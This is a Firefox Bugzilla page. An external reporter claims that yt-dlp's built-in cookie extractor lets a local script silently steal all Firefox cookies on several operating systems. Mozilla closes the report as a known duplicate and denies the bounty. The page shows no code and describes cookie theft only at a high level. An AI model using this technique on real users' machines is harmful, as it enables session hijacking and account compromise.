Closed Bug 1964105 Opened 3 months ago Closed 3 months ago

High-Impact Cookie Theft Vulnerability On Firefox - No Admin Rights Required

Categories

(Core :: Networking: Cookies, defect, P3)

Product:
Core
Component:
Networking: Cookies
Type:
defect

Tracking

()

Status:
RESOLVED DUPLICATE of bug 56788

People

(Reporter: robustrobot11, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [client-bounty-form][necko-triaged])

Attachments

(1 file)

REPORT_MOZILLA.md
6.18 KB, text/markdown
Details
Attached file REPORT_MOZILLA.md

A vulnerability allows a local attacker without administrative privileges to access and steal all cookies from Firefox on Windows, macOS, and Linux, potentially leading to full account compromise on websites.

Note: This report is being submitted to Chromium and Apple due to vulnerabilites of the same kind being present in Chromium and Safari.

Affected Platforms:

  • Windows
  • Linux
  • macOS

How does it work?

The Python library yt-dlp, popular for downloading videos from a variety of sites (most notably YouTube), has an in-built cookie extractor. The purpose of this is to extract cookies from a user's browser to bypass bot-detection on certain sites.

Specifically, the documentation can be found here: https://github.com/yt-dlp/yt-dlp/wiki/FAQ#how-do-i-pass-cookies-to-yt-dlp

The source code for the cookie extractor can be found here: https://github.com/yt-dlp/yt-dlp/blob/master/yt_dlp/cookies.py

As can be seen in the source code, there are a variety of decryptors built in. This includes Linux Keyring decryptors, and macOS Keychain decryptors, as well as Windows decryptors.

The core issue is how easily yt-dlp leverages OS features (DPAPI, Keychain, Keyrings) – intended for legitimate user data protection – to enable widespread cookie theft by any script or application the user can be tricked into running. It dramatically lowers the bar for this type of attack compared to an attacker having to implement all this decryption logic themselves.

A malevolent threat actor could use this to their advantage, by using the tool to export cookies from the browser, and use the cookies for malicious purposes.

Test Results on various Operating Systems

  • Linux (Debian Bullseye, KDE Plasma):
    • The script ran completely silently. No popups, no quickly opening and closing windows, no stdout.
    • The end result was:
      • Firefox: Extracted all cookies.
        • ⚠️ Data Breached
  • Windows (Windows 11):
    • The script ran completely silently again. No popups, no quickly opening and closing windows.
    • The end result was:
      • Firefox: Extracted all cookies.
        • ⚠️ Data Breached
  • macOS:
    • Direct testing on macOS was not performed, but analysis of yt-dlp's source code shows specific functions for macOS Keychain interaction (_get_mac_keyring_password, MacChromeCookieDecryptor), strongly suggesting Firefox on macOS is also vulnerable.

As can be seen with the test results on Linux and Windows, Firefox clearly suffered the most and lost all of its cookies on both OSes.

Proof of concept is shown in the attached document.

Flags: sec-bounty?
Group: firefox-core-security → core-security
Component: Security → Networking: Cookies
Product: Firefox → Core
Group: core-security → network-core-security

This is a well known issues, and potentially encrypting the cookie database is on our roadmap
https://www.cyberark.com/resources/threat-research-blog/the-current-state-of-browser-cookies

Severity: -- → S3
Priority: -- → P3
Whiteboard: [client-bounty-form] → [client-bounty-form][necko-triaged]

See the Device Bound Session Credentials proposal for a general solution.

Group: network-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 3 months ago
Duplicate of bug: 56788
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: